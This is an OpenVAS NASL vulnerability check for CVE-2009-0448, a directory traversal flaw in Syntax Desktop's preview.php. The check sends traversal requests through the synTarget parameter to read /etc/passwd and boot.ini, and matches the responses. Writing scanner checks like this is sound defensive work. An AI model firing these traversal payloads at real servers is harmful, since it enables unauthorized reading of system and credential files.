##############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_syntax_desktop_dir_trvsl_vuln.nasl 1009 2009-02-17 12:10:29Z feb $
#
# Syntax Desktop Directory Traversal Vulnerability
#
# Authors:
# Sujit Ghosal <sghosal@secpod.com>
#
# Copyright:
# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_id(800234);
  script_version("$Revision: 1.0 $");
  script_bugtraq_id(33601);
  script_cve_id("CVE-2009-0448");
  script_name(english:"Syntax Desktop Directory Traversal Vulnerability");
  desc["english"] = "

  Overview: This host is running Syntax Desktop and is prone to Directory
  Traversal Vulnerability.

  Vulnerability Insight:
  This flaw is caused due to error in file 'preview.php' in 'synTarget'
  parameter which lets the attacker to gain information through directoy 
  traversal queries.

  Impact:
  Successful exploitation will let the attacker gain sensitive information
  about the remote system directories where syntax desktop runs.

  Impact level: Application/System

  Affected Software/OS:
  Syntax Desktop 2.7 and prior

  Fix:
  Solution/Patch not available as on 17th February 2009. For further updates
  refer, http://www.syntaxdesktop.com

  References:
  http://www.milw0rm.com/exploits/7977

  CVSS Score:
    CVSS Base Score     : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P)
    CVSS Temporal Score : 6.7
  Risk factor: High";

  script_description(english:desc["english"]);
  script_summary(english:"Check for LFI attack string on Syntax Desktop");
  script_category(ACT_ATTACK);
  script_copyright(english:"Copyright (C) 2009 Intevation GmbH");
  script_family(english:"Web application abuses");
  script_require_ports("Services/www", 80);
  script_dependencies("http_version.nasl");
  exit(0);
}


include("version_func.inc");
include("http_func.inc");

synPort = get_kb_item("Services/www");
if(!get_port_state(synPort)){
  exit(0);
}

foreach path(make_list("/", "/admin", cgi_dirs()))
{
  request = http_get(item:"/index.php", port:synPort);
  response = http_send_recv(port:synPort, data:request);
  if(response == NULL){
    exit();
  }
  if("Syntax Desktop" >< response)
  {
    # LFI Attack request for Windows OS
    request = http_get(item:path + "/admin/modules/aa/preview.php?synTarget=" +
                          "../../../../../../../../../boot.ini", port:synPort);
    response = http_send_recv(port:synPort, data:request);
    if("boot loader" >< response)
    {
      security_hole(synPort);
      exit(0);
    }
    # LFI Attack request for Linux OS
    request2 = http_get(item:path + "/admin/modules/aa/preview.php?synTarget=" +
                        "../../../../../../../../../etc/passwd", port:synPort);
    resp = http_send_recv(port:synPort, data:request2);
    if("root" >< resp)
    {
      security_hole(synPort);
      exit(0);
    }
    exit(0);
  }
}
